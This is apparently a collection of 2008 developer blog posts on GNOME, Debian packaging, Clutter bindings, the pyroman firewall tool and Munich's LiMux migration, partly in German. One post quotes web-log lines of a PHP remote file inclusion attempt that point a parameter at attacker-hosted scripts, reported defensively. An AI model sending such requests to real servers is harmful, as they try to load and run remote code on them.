Before

 

Note how the regular grid layout is destroyed by the long file name, which can make its row very large.

 After

             

Note how the grid layout is preserved, while the whole filename is still visible as the file is selected or hovered.

Take that five year old bug report! Thanks to the incredible Pango grand master Behdad. Many play the Banjo, but only few master the Pango.

Update

I received lots of feedback. Many appreciations were given, some usability concerns were raised and some people just didn’t like the change. Therefore, I added GConf keys that allow you to control in detail (i.e. for all zoom levels, and for the desktop) how many lines of text you want.

Another proposal was that file extensions should never be truncated. This will be implemented as Pango supports it. There is also an interesting recent user request to ellipsize file names depending on the other displayed file names (assuming you have “alongfilename-01-continuin-hereg.jpg”, “alongfilename-02-continuing-here.jpg” the result is supposed to be “along…e-01-…ere..jpg”, “along…e-02-…ere..jpg”.

YouTube video demoing a book with 3D pop-up letters. Very cool, even when the video requires Flash to watch.

From my security monitoring:

suhosin[25775]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '67.19.104.82', file '[...]')

The web logs contained:

GET //?_SERVER[DOCUMENT_ROOT]=http://sekip.axspace.com/alat/r0x.txt?? HTTP/1.1

Is this some new PHP attack vector (that happens to be blocked by the suhosin security module)? I thought it was related to ConPresso, but I've also found similar accesses in my logs that were on sites that don't use PHP (and thus did not trigger a suhosin alert). Obviously these don't relate to ConPresso, so it seems more like a brute force / mass attack?

Another host involved:

80.93.54.47 ... GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1

That referenced URL still works, so if you want you can retrieve the 'exploit' code. But all it apparently does is to try various methods to execute "id", probably to locate web servers that are vulnerable and maybe even running as "root" user.

Obviously this is a brute force; that site doesn't have an index.php.

Is that anything new? Or is it just some script kiddie trying to re-use an aged exploit? But on the other hand, I havn't seen such a suhosin alert in months. Anybody knows which PHP script might be vulnerable to this attack vector.

If you've got any details, contact me at erich@debian.org; my blog intentionally does not have comments or trackbacks.

[Update: I've received two mails pointing out that such vulnerablities are found in some PHP apps every now and then, so it might just be some script kiddie scanning brute force once more. Supposedly this cannot be exploited when register_globals is off and/or suhosin is used.]

OpenSync update

To give some update on the state of OpenSync in Debian, I have uploaded libsycml-0.4.7 to experimental a couple of days ago. This is significant in sofar as a lot of development and bug-fixing (mostly by Michael Bell) happened for this release, as well as some committment to maintaining an API and at least responsively versioning the library. In order to use libsyncml-0.4.7 with OpenSync, a newer libopensync than 0.36 is needed; however, current OpenSync trunk has seen a lot of changes in plugin handling and plugins need to get ported to the new API.

So I uploaded the last known-working revision of OpenSync along with corresponing revisions of the file-sync and syncml plugins, the vformat module and a rebuild of msynctool to experimental for now. I did not have the time or energy to migrate/upload the other plugins yet, and as it seems that OpenSync-0.37 will only ship with ported file-sync and syncml plugins, it might not make much sense. I also took over maintainership of the related wbxml2 package, and upload a patch by Michael Bell which seem to fix a lot issues people are having with SyncML.

The good news is that it seems all of the new features for a 0.40 stable OpenSync release have been finished according to the roadmap , most notably a common plugin configuration system and the machinery for a migration path from 0.22 to 0.40 configurations (plugins still need to support/implement that I believe), so no more big API changes are expected and the focus will be on bugfixing and plugin discovery from now on. This means developers will be able to start porting their plugins to the 0.40 API once 0.37 is out and front-end authors can start to take a look at the architectural changes which were made to facilitate their jobs.

My hope is that conduit will be able to leverage the OpenSync technology and introduce a solid GUI for this (as kitchensync does for KDE), making syncronization finally work on the desktops.

From the Debian packaging point of view, I have been mostly on my own now for the last couple of months. However, I recently registered an Alioth project in order to maintain the packages in a subversion repository (I have not yet decided whether it is worth importing the 0.22 packages targetted at lenny), and people who are interested in helping should contact me.

cluttermm

There are now C++ bindings for the various clutter-0.8 libraries. That’s cluttermm-0.8, clutter-gtkmm-0.8, and clutter-cairomm-0.8. The tarball versions are 0.7.x because they are not ABI-stable yet. Armin Burgmeier did most of the work for Openismus to update cluttermm for clutter-0.8 and make it mostly complete.

I’d still like to find the time to do a C++ version of my Clutter tutorial.

clutter-box2d

I really wanted to look at clutter-box2d. It’s the clutter-with-simple-2D-physics thing created by Øyvind Kolås. His Moblin Playground Clutter prototype (watch the screencast) shows how it might be used. For instance, it makes it easier to implement the spinning circular menus you see at the left and right, and to implement the photo “table”. Since I wrote the clutter tutorial, I’ve thought we need abstractions such as this.

So I wrapped it as clutter-box2dmm and made C++ versions of its examples to get familiar with it.

clutter-box2d provides a ClutterBox2D (or Clutter::Box2D::Box2D in C++) container actor, which has child properties for its child actors. For instance, you can say whether the actor should be static (not moving) or dynamic (moving and colliding according to some simple physics), and you can say whether the actor should be manipulatable by pushing it around with the mouse. You can also specify its velocity. These are explicit methods on the Box2D class in the C++ binding.

You can then start the simulation on the ClutterBox2D. By default there is normal gravity (a bug, I think), which makes examples fun. The examples create a static box around the edges of the ClutterStage so the actors don’t fall out of it.

You can also specify some joints to connect actors in certain ways, such as a distance joint to put an invisible rod between them, or a revolute joint, as used to link the sections in the chain example. The joints are a bit difficult to understand.

This is all useful apart from some minor bugs that seem fixable, maybe together with the Box2D project that clutter-box2d uses. (Can’t stop damping and Can’t stop rotation.) It would be even more useful if applications could respond to collisions between objects and objects arriving at locations, which is apparently also doable.

However, I think clutter-box2d provides only some of the abstractions that I’d like. I particularly still miss the ability to simply define a rail and put an actor on it so its motion is restricted to that path. The actor would then be moved programmatically (maybe just by specifying an end point to reach) or by the user. clutter-box2d could do that by defining a rail and some runners, but it’s not a high level concept, and it’s probably not efficient.

I’d also like the idea of actors falling into locations as you move them, like those ball bearing maze games, and maybe it would be useful to have some ability to connect actors by elastic, and to let them bounce and compress.

As mentioned earlier, I've uploaded a new Pyroman release to Debian. I've also updated the download at the download page on alioth for the non-Debian users.

There is just one single user-visible change (under the hood I switched some Python API so you need python 2.4+ now, which was available in sarge already):

This version has a new command line option, "--verification-cmd". This can be used to point to a script file to verify network connectivity. For example, you could try to send a ping to the next router, or you could ssh to another host, have it ssh back and touch a flag file in /tmp to signal success.

Similar to the --safe option, it is meant as a safety feature to avoid locking yourself out of your system. But while --safe needs to be used interactively, this new command could be used when automatically activating new firewall rules, e.g. triggered by cfengine or some other configuration management. If the verification command does not succeed, the firewall rules will automatically be rolled back to the previous state.

Note that I didn't get around to add IPv6 support yet. It would definitely be desirable to add ip6tables support, but I currently do not have any experience with IPv6, so I'm not sure I'd know how to do things right. Of course I'd welcome any patches.

(In case you havn't read about pyroman yet - it's yet another tool to configure iptables firewalls. It puts a thin abstraction layer on top of iptables, but the main benefit is that it uses "iptables-restore" to quickly mass-set all the firewall rules - other tools tend to invoke several hundred iptables processes to achieve the same - and if any error occurs it will both give you a clear indication of which rule caused the error and rolling back your firewall to the previous state.)

Today, I uploaded a new version of my firewall configuration tool, pyroman, to Debian unstable.

About 4 hours later I googled for "Pyroman Debian" and was surprised to find the upload notification in the top results. The first hour of this was probably spent with me doing some package function tests (I don't want to upload broken packages, after all), then the announcement was distributed to the -changes mailing list at Debian, which in turn was picked up by Google Groups.

However that might be due to groups.google.com getting special treatment, though. For this resource, Google can actually trigger an update instead of having to have a spider frequently re-crawl all the contents.

Still I find it pretty impressive to have such new data already in their main index. I was used to this e.g. for blog and news search, but not for regular web search.

I’d like to open an Openismus office in Berlin in the next couple of months, for about three of our people. I don’t have much idea where office rental is advertised in Berlin. What’s the equivalent of the Süddeutschezeitung’s small ads there?

I’d love us to have something in Kreuzberg, near Schlesiches-Tor, maybe by the river there, but it looks like Prenzlauerberg will be more convenient for Mathias to get to. I’d like to avoid being in one of the anonymous office buildings in the centre of town. It’s much nicer to have something with character in a lively residential area like Kreuzberg or Prenzlauerberg which is still close to everything by public transport.

Endlich geht sie los. Jetzt wird es deutlich ruhiger, die nölenden Schüler verschwinden bald in die Ferien, viele Papas und Mamas dazu - Ruhe in der Stadt!

Ich gönne mir im August ausschließlich 4-Tage Wochen, um endlich die aufgebauten Überstunden wegzukriegen. Erholsam!

Einzig sicher ist, dass zwischen Mitte bis Ende August irgendwas über LiMux berichtet werden wird, das der PResse das Sommerloch mit reißerischen Schlagzeilen füllt - so war es in den letzten Jahren oft genug. Also nach Ruhe und Erholung sicherlich noch eine Überraschung!

Was will man mehr?

In diesem Sinne schöne Ferien, erholsamen Urlaub und genießt die ruhigere Zeit

My advisors just told me my grade for my final thesis I handed in two weeks ago: a 1.0 (which is the best possible grade here).

Well, they've been quite clear about this being the likely result before, since the thesis worked out very well, with a publication on a good conference and such. So right now I'm looking forward to continuing this research and doing a PhD degree. Right now, this would be my favorite option, if I manage to get a position at the university.

Nautilus 2.23.5(.1) [shipped with GNOME 2.23.5] has tab support,  an eject button next to mounted volumes in the sidebar, and a “restore” feature for the trash that figures out the location where a file came from automatically before moving it out of the trash.

Unfortunately, moving files out of the trash in general takes a very long time with GVFS due to a bug. We would be very pleased if you volunteered to fix the bug:

http://bugzilla.gnome.org/show_bug.cgi?id=529971

Since everybody nowadays comments on the future of GNOME/GTK+, I’d also like to add my two cents - although more briefly than others.

In short, I think we’ve reached our objectives and should polish GNOME 2 ’til doomsday.

3.0? No!

As of writing, I see no reason for delivering a (long-term) API/ABI-incompatible GNOME 3.0 or GTK+ 3.0, and many have written the same before. I’m just repeating it here to make sure that everybody, including the kind-hearted individuals who try to force a GSEAL’ed GTK+ to make it more clean, are aware of the massive opposition against this plan.

C is ugly as hell and does not support public/procted/private classes. Therefore, no C programmer can really mind ugly exposed internals. Adding setters and getters is a in principle a good idea, but there is no reason to break working applications that access data exposed in GTK+ structs. Maybe a GSEAL() fan could tell me how third-party subclasses that are derived from GTK+ stock widgets can access protected member variables? If you just expose getter/setter functions, everybody can access the internals, and you could have put it into the object’s struct anyway.

Status Quo: Conservative + Boring

The current GNOME and GTK+ development clearly “stalls” or “stagnates”. From the point of a developer this sounds horrible. However, you could also formulate that positively and call it “solid”. We’ve come a long way. Since GNOME 2.0, our target was to deliver a non-obtrusive, simple and useful desktop environment. We’ve done our best, and people love it. I know many people who use GNOME because it’s simple and clean.

Radical Concepts => New Project

We created a successful brand by radically sticking to one strategy: Simplicity. The current traditional desktop approach without any fancy database concepts is very successful and is used by many people.

The brand will be damaged if we throw in half-baked complex interaction concepts. Like many of you my dear readers, I love the idea to use the computer as a personal assistant or secretary, and I’ve also thought how it could work in such a scenario. However, at least radical concepts (“GNOME Online Desktop”, “everything is organized as database”, etc.) should clearly be put forward outside the GNOME project, at least until they are mature and proven in a testing environment with average people instead of “innovation” fanboys. “Innovation”, after all, is just a buzzword, and in science they often just re-invent old concepts. I’m sure that the scientists among you will agree with this.

It may sound a bit disappointing that we’ve become conservative, but that’s the typical life cycle of people in western civilization, why shouldn’t it also apply to software projects with well-defined objectives?

Jhbuild seems to have a general problem with D-Bus. This has become obvious now that GConf is using D-Bus instead of ORBit (see these gconf-list messages: 1, 2).

To make GConf work in jhbuild, you need to do this in each jhbuild shell:

dbus-launch --exit-with-session bash

Then there’s the problem of Avahi. To make Avahi work in jhbuild, you need to do this in each jhbuild shell:

export DBUS_SYSTEM_BUS_ADDRESS=unix:path=/var/run/dbus/system_bus_socket

I wish that jhbuild has some general solution for these issues by default because I suspect that these are just hacks.

However, I imagine that it’s a difficult problem. For instance, you probably don’t want to kill the main (non-jhbuild) D-Bus (and D-Bus services) because that would break your desktop. But you probably want a different D-Bus (and D-Bus services) for jhbuild. The two prefixes don’t seem to work well together in D-Bus at the moment.

Liam is now six and a half months old. He’s not crawling yet, but in the last couple of weeks he has learned to get around quickly by doing a kind of commando elbow crawl. It lets him entertain himself without being carried around so much, but we must now move many things up from the floor level.

Over the last month or so I’ve been moving various GooCanvas stuff to GNOME’s infrastructure, on Damon’s behalf, away from Sourceforge.

As you can see on the live.gnome.org GooCanvas page, it’s now in svn.gnome.org, we have a gnome.org mailing list, we use bugzilla.gnome.org, and the documentation is on library.gnome.org.

Thanks to the various admins.

Last week was the GUADEC Conference in Istanbul. Overall it felt like one of the best GUADECs, just because I like Istanbul so much. It’s a proper city.

That’s despite the organization of the registration, accommodation, travel instructions (to the venue) being a near disaster (as they usually are). For people who made it to the venue, the University was a perfect location - efficient and clean and well equipped, with many helpful volunteers keeping things organized.

It was great to have all the Openismus employees together in one place for the first time, sharing apartments in a building near the Galata tower in that wonderful maze of narrow streets. It turns out these are great people to hang out with, particularly when you have a rooftop terrace looking over the city and a fridge full of beer on a summer night.

On Thursday morning I fly out to Helsinki with Sigi and baby Liam. I have a day of meetings on Friday, also with Jan Arne from Openismus, and then some touristing until Tuesday, including a night in Tallinn. I’m looking forward to seeing our Helsinki friends.

I’d walk around and tell people to find more useful projects than wasting their time with adding tabs to each single GNOME application. Maybe the semmingly true rumors that one or another GNOME fellow might be somewhat lunatic (panties, anybody?) inspired theprogrammers who are implementing this.

One initial aspect: Calumn is totally right that tab implementations at application level are an effect of the lack of platform MDI support. We implement it at application level where we need solutions today and tomorrow, rather than the day after tomorrow. However, it is not yet clear whether tabs are useful at all for 90% of the applications.

Why tabs for Nautilus (and web browsers, spreadsheet, …) are a good idea

Let me briefly explain why I added tab support to Nautilus: It helps people with their workflow. Today, I used it to tidy up my document folders. I could use it to navigate between file operation source and destination folders extremely quickly, using the keyboard and ctrl-x, ctrl-v, and ctrl-page-up/down. I was two times as fast as with a console (where you need auto-completion), and five times as fast as with a mouse

Tab support for browser-like file managers is a good idea, because people know how to use the tab concept properly since it has been invented for web browser. It is also useful for spreadsheets, where you often compare multiple documents and calculations. It is also useful for having multiple conversations at once, because each of them is linear, and you can use the tabs to switch between losely-associated linear tasks or documents.

Why tabs for media players are a bad idea

On the other hand, tab support in Totem is ridiculous. Somebody must have put LSD into the GUADEC social event food, and everybody now feels like Syd Barrett and his Lucifer Cat!

Regarding Totem: It is already perfectly doing what it should do: Play a song or video, and let me queue more of them. One song or video at once. How can I watch two videos at once?

Why you should think first, and implement features afterwards (i.e. gcalctool tabs)!

Let me exemplify this regarding gcalctool:

Even my non-programmable pocket calculator (Casio FX-991ES) has more features than this non-noticeable desktop calculator. Amongst others, it can not deal with symbolic calculations, complex numbers, nature constants, variables. It does not even have a calculation history as I mentioned in a comment in Scott James’ blog. This is a shame! Before you implement such a craptastic feature, think about how it will be used! Again: gcalctool does not have any calculation history. This is as if I implemented tabs in Nautilus without implementing the back/forward button before, so you had to switch to a new tab each time you want to display a new folder.

Now I’ll do something useful and learn for my function theory exam.

You talented developers at GUADEC should also do something useful and fix the GTK+ tree view mouse interaction.

All-Clear :o)

It turns out that the tab implementations were just mockups. Have fun at GUADEC!

This tool collection wants to help Ubuntu translators in their daily work. If you have ever aksed one of the following questions, u-t-t could provide you an answer: In which package can I translate this message/dialog? What is the difference between these two po files? How can I access the translation page of a package in a faster way compared to clicking through the whole website tree or manipulating the url? Where can I get the automatically updated language packs?

Tools

podiff

podiff is a command line tool which compares gettext po files. These files contain the original messages and their translation. It allows to easily spot new, fuzzied, changed or lost translation and new or removed messages of two different po files. The ouput is a lot more human friendly than the one of the often used "diff -ruN" command.

Furthermore it features a po file creation function: all changed and new translation will be written to a po file which hoepfully makes reviewing and sending to upstream a little bit easier.

Type "podiff --help" in a terminal window for more information.

search-translation

This command line script searches for a message or translation in the locally installed language packs. With search-translation you can easily find the po template and the corresponding package of a message in the user interface. It was inspired by a script posted by Malcom Parsons on the ubuntu-translators list some time ago. The motivation is that Launchpad Translation does not provide a corresponding search function.

Type "search-translation --help" in a terminal window for more information.

language pack repository

Shipping a sources list snippet the semiweekly language pack updates can be enabled in System>Administration>Software Sources on the third-party software tab by just one click.

Rosetta FireFox search box

This custom search engine for FireFox allows you to access the Launchpad Translations website of a package in a very fast way: Select the Ubuntu Package Translation search engine, type the name of the package and press enter.

Install

To install ubuntu-translators-tools for Ubuntu 8.04 you have to enable this personal package archive. Just add the apt sources list entry in System->Adminstration>Software Sources>Third-party>Add or using your favourite text editor in /etc/apt/sources.list.

Afterwards install the package ubuntu-translator-tools.

Yay! I just handed in my Diploma thesis in Computer Science (approx. Masters degree). It will still be some weeks until it has been graded, the dean has signed the diploma etc., but I'm pretty much done.

The topic of my thesis is

Statistical Approaches for Robustifying Correlation Clustering Algorithms

so my field of research is Data Mining, in particular Data Clustering and Outlier Detection. My particular contribution is to improve the accuracy of PCA results in the presence of noise.

Some ideas of the thesis are also just being published at the 20th International Conference on Scientific and Statistical Database Management (SSDBM) July 9-11, 2008, Hong Kong, China and the associated proceedings (Springer LNCS volume 5069):

Hans-Peter Kriegel, Peer Kröger, Erich Schubert and Arthur Zimek. A General Framework for Increasing the Robustness of PCA-based Correlation Clustering Algorithms

Other related publications will follow (an outlier detection method using parts of my thesis will be submitted to a journal soon, too). And in case the first name on that list rings a bell: he did some major contributions to multi-dimensional data structures such as the R*-Tree, X-Tree and Buddy Tree, and has since been very active in data mining.

I'll be giving a short talk at the graduate seminar next week, and I'll probably publish the slides on my web page. But they will only be a short excerpt of my work due to time limitations of the talk.

So basically, I'm jobless now! :-)

I still have plenty of related ideas to continue research, and my advisor asked me if I'd like to continue with a PhD degree (so you can assume the grade of the thesis won't be too bad). However, the university is always short on open positions, and I don't know if I'll be able to get one (a research proposal is pending). Therefore, I'm looking for a position that allows be to pursue data mining and/or clustering research. Part time jobs are fine if they are well enough paid, although it of course would be best if the job would just include related research. If the job is located outside of Munich, a contact to a local university with a strong data mining research group is needed. (In Munich I obviously already have contacts to a strong research group.)

As you might figure from me posting on Planet Debian, Planet GNOME and similar, I'm fairly experienced in OpenSource and Linux (something like 19 years of programming experience, 13 years of Linux experience). So I'm not just a fresh graduate, but a doer when it comes to coding. (Which is partially why I'd prefer a job outside of the university!)

Anyone with interesting job offers (Google Munich anyone? I've been trying to get a back channel contact with you for weeks), please just drop me an email at erich AT debian DOT org.

P.S. No, that doesn't mean I'm only looking for jobs in the data mining field. It would just be more convenient.

Nautilus 2.24 will have tab support:

Thanks to Jared Moore for making the tab user interface consistent with Epiphany and GNOME Terminal.

Over the last two years, a couple of people have had problems sending email to my openismus email address. They never received any failure message, but the mails never arrived. This was annoying and mysterious, but the problem was obviously with the senders’ systems so there wasn’t much I could do.

This week one more person had the problem. All three people were German, which made me suspicious. We discovered that all three people were using bytecamp’s email servers. For instance, gnome-de.org email addresses are hosted at bytecamp (for free, I believe). Major clue.

openismus.com was hosted at bytecamp a couple of years ago, but I moved it away because I found their services limited and rather ad-hoc, though it seems to have improved since then. It turns out that they forgot to update their MX records, so they were just swallowing any email to openismus.com from their remaining customers. Some emails to bytecamp solved the problem, so bytecamp customers can now send email to us again.

I do hope that several German GNOME developers (with gnome-de.org email addresses, for instance) have been trying to email me about working for Openismus. If you didn’t get a reply before, please try again.

The Openismus T-shirts for the GUADEC Istanbul conference are ready.

I wanted to do something different again, so I persuaded the people at Brandt to do a kind of Rolf Harris punk thing. It’s a little bit funky. I don’t think it will please everyone but it will be noticed. Each one is different.

There was a shortage of T-shirts in these colours, so we did a small batch of classic retro-style dark green T-shirts too, with white banding and stripes with white flock-print. They are quite nice but less challenging.

Like last time, I chose to do a small number of expensive T-shirts rather than lots of cheap ones. Scarcity adds value.

After six months I started running again, trying to lose my 5Kg of paternity weight. I’m up to four bridges again, out of a usual eight.

This gives me the chance to listen to my Pimsleur Turkish course again while running. Hopefully I’ll be able to say very few things well, so I’ll be looking for opportunities to use my small collection of nouns and verbs at GUADEC in Istanbul next week.

Yesterday I received my new Lenovo Thinkpad X61. It’s the UX29DGE model, with Intel GMA X3100 graphics (gnome-device-manager says GM965/GL960), and 2.20 GHz Core Duo T7500. It shows up as Model 76739DG in gnome-device-manager.

After fighting with Windows Vista to reduce its partition size enough, I installed Ubuntu Hardy easily. I wanted to keep Vista around so I can look at it sometimes, but that short experience of it is enough to help me understand why people hate it so much. It’s as if they went out of their way to break all the basic principles of UI design, as if the managers had a running feud with the human interface department and wanted to outrage them. People who hate computers (most people), and who think that computers hate them, will not be surprised.

But it’s great to have a new laptop on which everything works. Even hibernation. I’ve never seen that work before and it’s truly useful. I wish my desktop could do it, in the absence of working session management.

I am a little disappointed that it’s almost as hot as my Acer. I guess this is just how all laptops are. How do people manage to use these things on their laps? Do we need a control panel to limit the CPU speeds, together with the internal temperature sensor, with options for “cosy”, “slow grilling” and “burning trousers”?

Am 9.7. um 11 Uhr bei uns im Rathaus. Mal sehen wer alles so kommt, Zielgruppe ist primär die Münchner Lokalpresse, die IT Themen eher selten aufgreift. Vielleicht schafft es unsere Bürgermeisterin ja, LiMux verständlich zu vermitteln.

Ich selbst bin nicht dabei, weile ja gerade am Strand in der Sonne

Our new hires (André, Karsten, Jan Arne) are nicely settled in now, so it’s time to find some more. There’s exciting development work to be done at Openismus using GTK+ and GNOME code. I think our employees like how we work. I try to keep them happy and not too stressed but you can probably track them down and ask them yourself.

As usual, we prefer people who live in Germany, or EU citizens who want to move to Germany. Please tell me about yourself in an email or grab me for a chat at GUADEC.

… oder eher schon 30?

Naja, ich werd’s ja spüren in den kommenden Jahren *g*

Die österreichische Bundeshauptstadt setzt ja ebenso wie München derzeit (noch) auf freie Software. Auch wenn es zuletzt ein wenig turbulent zuging…

Die Bürgerrechtsorganisation quintessenz hat bei mir gestern angefragt, ob ich nicht Lust hätte, unser mittlerweile sehr erfolgreiches Umstellungsprojekt auch dem interessierten österreichischen Publikum vorzustellen. Da konnte ich natürlich nicht nein sagen, Wien ist eine wunderschöne Stadt und das Museumsquartier (in dem ich auch vortragen darf) eine sehr interessante Gegend.

Wer sich dafür interessiert: 24.6., 20 Uhr, weitere Infos hier.

Gestern haben sie es endlich auch öffentlich eingesehen, Respekt.

“ODF has won”

sagt Stuart McKee, der nationale Technikleiter für den öffentlichen US Bereich. Mehr gibt’s hier.

Heute ist das Open Source Observatory and Repository, eine Plattform der EU Kommission zum Thema freie Software für Verwaltungen in Europa, auch offiziell online gegangen.

Die URL ist: www.osor.eu

Wir Münchner sind dort bereits seit drei Wochen vertreten und haben durch die Veröffentlichung unseres WollMux als freie Software als Betatester die Plattform auf Herz und Nieren getestet.

Da war ich also gestern Abend in der Lufthansamaschine nach Brüssel und diese war kurz davor auf die Startbahn zu rollen. Tja, dann macht sie plötzlich kehrt und rollt wieder in Richtung Flughafen zurück.

Hier spricht der Captain. Wir haben das Gepäck eines Passagieres an Board, der noch zusteigen muss - deshalb kehren wir zu einer beliebigen Parkingposition zurück.

Häh? Wir sind dann nicht zur nächstbesten Position gerollt und haben auf den Passagier gewartet, sondern sind quer über den gesamten Münchner Flughafen zur allerletzten Position irgendwo in der Pampa gerollt. Da kam dann ein verdunkelter Kleinbus und hat einen Mann ausgeladen, der brav auf einen der hinteren Plätze in der Holzklasse gegangen ist.

Und dann sind wir gestartet…

Zwei Fragen:

• Was soll das?
• Wäre es nicht einfacher eine nahe gelegene Parkposition zu nehmen und den Mann mit dem PKW dorthin zu bringen, anstatt das Flugzeug zum Mann?

Antworten werde ich wohl nie erhalten…

While I was in North Berwick, we went through my fathers stash of photos and found lots of slides made by my grandfather showing my father as a teenager and me and my sister as babies and young kids.

I bought my father a Plustek OpticFilm 35mm slide scanner and a Flickr Pro account. He’s using Windows XP (I don’t think this model works on Linux). The results are pretty good, though the Plustek OpticFilm scanner should make it easier to get better colors in its QuickScan mode. Its full scan mode can do better but its UI is incomprehensible to mortals. It can scan 35mm negatives too. He’s scanning a few each day, adding to his Flickr photostream.

The older slides are glass-mounted 120mm (also known as three and a half inch) slides. I took those to Pyramid Imaging in the Grassmarket in Edinburgh, who did a great job.

Some links to notable pictures so far:

• My parents after their marriage at the Edinburgh registry office, outside the Carlton hotel.
• Me, as a large ugly baby with bad fashion sense even for the 70s.
• My father as a sullen teenager in 1955.
• My father as a teenager on some icy slope in Austria in 1956, without proper equipment.
• My grandfather in 1954, looking cooler than he was.

As much as I dislike Ubuntu’s Launchpad bug tracker, Fedora Linux seems to have made something worse.I guess they want to discourage people from submitting bug reports.

For instance, I want to file a bug about the Glom package. Here are some things I tried:

Go to Fedora’s package page for Glom (I had previously found this and put a link to it on glom.org):

• That page has a View Bugs link at the left but that’s not about bugs for this package. I would have to find Glom in a huge multipage package list.
• The Bug Reports link at the top is more useful, but it just shows (no) open bugs without allowing me to report one.
• There is a Login link at the top right. Maybe I could do more if I was logged in, but there is no way to register.
• The Report Bugs link at the left takes me to a Fedora Trac on fedorahosted.org but that page tells me “TICKET_CREATE privileges are required to perform this operation”. There is a login link, but no way to register to be able to login. Have I mentioned that I hate Trac.

Go to Fedora’s web site like a normal user (I googled):

• I see no link to file a bug.
• I tried the Get Help link but only saw information about IRC, mailing lists, forums, and documentation.
• I tried the Communicate link. In the middle of that page (after information about IRC, mailing lists and man pages) there is a link to bugzilla.redhat.com. Clicking Enter A New Bug Report takes me to a big list of Linux versions, mostly Red Hat. There’s a list of Fedora stuff that’s almost as big. I chose the Fedora product, found glom in the list of components, and managed to file a bug. But glom is also in the list of components for the Fedora EPEL (Extras) product. Should I have filed it there instead?

It wasn’t easy, but I found some accommodation for the 7 Openismus employees who are going to GUADEC in Istanbul. The recommended accommodation (The 2 Hotel Golden Horn hotels) was booked out and I guess it has been for some time. You’ll be lucky to even get a reply from those hotels.

We booked two apartments (Glorya Penthouse Terrace and Glorya Tower View, in Beyoğlu near the Galata tower on the east side of the river.) from Istanbul Holiday Apartments, who are not cheap, but who speak (email) perfect English and are very straightforward.

I seem to have been completely wrong about the cost of accommodation in Istanbul, though it might be easier for individuals. I guess the city has boomed since my last visit. But over the last few years I have noticed that hotels everywhere have become increasingly unlike the places surrounding them. Most people who work in hotels could never afford to stay in them.

zum brüllen:

Danke an Floeff

Das hat gesessen heute in Brüssel. Nicht nur, dass eine EU-Kommissarin zu einer Veranstaltung des OpenForum Europe geht und eine Keynote hält - nein, der Inhalt war sicher schwer verdaulich für einige der ca. 150 Anwesenden im Hotel Conrad heute morgen mitten in Brüssel.

Wie sonst kann man es deuten, wenn Frau Kroes, die oberste Wettbewerbshüterin der EU, zwar diplomatisch, aber trotzdem deutlich auf sehr aktuelle Diskussionen rund um offene vs. proprietäre Standards eingeht, mehrfach dabei betont, dass natürlicher Wettbewerb gut sei und Zurückhaltung von Seiten der Regulierer sehr wichtig ist, aber dann jeweils das berühmte ABER anfügt.

Einige Zitate und auch der vollständige Redetext sind verfügbar:

Reuters (englisch), heise.de (deutsch), New York Times (englisch)

Als einer der folgenden drei Redner konnte unser Münchner Oberbürgermeister aus der Praxis berichten, dass freie Software und offene Standards schon längst Alltag sind und durch Offenheit der Wettbewerb im Softwaremarkt stimuliert wird. Gleichzeitig konnten wir nochmals verdeutlichen, was OOXML an potentiellen Einschränkungen für einen freien und fairen Wettbewerb mit sich bringt und haben natürlich Frau Kroes empfohlen, hier nochmals genauer hinzuschauen und mit Nachdruck Microsoft klar zu machen, dass den letzten positiven Ankündigungen auch wirklich messbare und v.a. brauchbare Ergebnisse folgen müssen.

Überrascht hat mich das Medieninteresse in Brüssel und die Informiertheit der Anwesenden Journalisten. Noch lange nach offiziellem Ende der Veranstaltung waren “informelle” Gespräche über Hintergründe im Gange. Die Vielzahl der noch im Laufe des Mittags erschienenen Berichte (im englischsprachigen Bereich, die deutschen ziehen gerade nach), zumeist inhaltlich komplett am Thema, zeigen welche Wirkung die Rede der Kommissarin hatte. Sogar die New York Times berichtet, der Korrespondent war da.

Jetzt hat sich DG Wettbewerb klar positioniert, ich bin gespannt, ob DG Informationstechnologie ebenso nachzieht und die Kommission damit ein sehr sehr starker Befürworter und Nutzer offener Standards wird.

Es gibt wieder Jobs bei der Stadtverwaltung München! Bei den Bereichen, die auch künftig sowohl unseren LiMux Basisclient als auch die Kombination WollMux+OpenOffice.org weiterentwickeln und betreiben sind derzeit insgesamt vier unbefristete neue Stellen ausgeschrieben.

Wer mehr Infos braucht (www.muenchen.de/stellen):

• IT-Spezialistinnen/IT-Spezialisten zur Weiterentwicklung des LiMux Basisclients und zur Unterstützung der LiMux Office-Migration (PDF, PDF)

Die Bewerbungsfrist läuft imho noch bis zum 30. Juni 2008.

Dear Internet, I think this is the hard drive on my Acer Travelmate 4100. How on earth do I remove this metal plate thing and get to the hard drive itself, so I can put a new drive in? I’ve already broken the little tab of clear plastic by pulling on it.

Update: Nevermind. There’s a little screw to the right and then it slides across. I thought the screw was for something underneath.

I don’t know why some projects use Trac, though it’s been chosen by some people who I respect. It frequently annoys me.

For now, I’ll restrict my rant to Trac’s bug tracker. It fails to do the basic things that bug trackers should do: Make it easy to submit a bug, and make it easy to see a list of open bugs.

• The bug tracker comments use Wiki Formatting, meaning your comment and its formatting is very likely to be mangled. This is hateful to regular users and probably annoying to most technical users. And enjoy guessing which flavor of wiki formatting it uses. Reading the formatting documentation might not add to your enjoyment.
• There’s no way to see the bugs that I have submitted. The “My Bugs” report is apparently a list of bugs assigned to me (if I am a developer). It’s hard to know because it’s cryptically described as “This report demonstrates the use of the automatically set $USER dynamic variable, replaced with the username of the logged in user when executed.”
• It sends me email even for my own changes to bugs.
• It calls bugs “tickets”. Sometimes it calls them “defects”. This makes it hard for people to easily see where to file a bug.

Kommenden Dienstag lädt das OpenForum Europe ein zum “Breakfast Seminar: Being Open About Standards“.

Die EU-Kommissarin für Wettbewerb, Frau Neelie Kroes, wird die Keynote halten - und unser Oberbürgermeister Ude im weiteren Verlauf darstellen, was offene Standards für München an Vorteilen bringen. Selbsterklärend, dass ich ihn dorthin begleite und natürlich werde ich berichten, was so alles passiert. Neben den Veranstaltern haben sich die üblichen Verdächtigen der closed standards Szene (BSA & Co.) angesagt und werden vermutlich keine Gelegenheit auslassen, ihren bei der Kommission fragwürdigen Ruf in besseres Licht zu rücken.

Spannend, zumal die Veranstaltung nicht durch den für Informationstechnologie zuständigen Bereich der Kommission, sondern durch die Wettbewerbskommissarin begleitet wird. Ebene jene, die Microsoft in den letzten Jahren insgesamt 1,7 Milliarden Euro an Bußgeldern aufgebrummt hat.

I’m back from North Berwick where Liam met his grandfather and aunt. We’ll try to visit once a year.

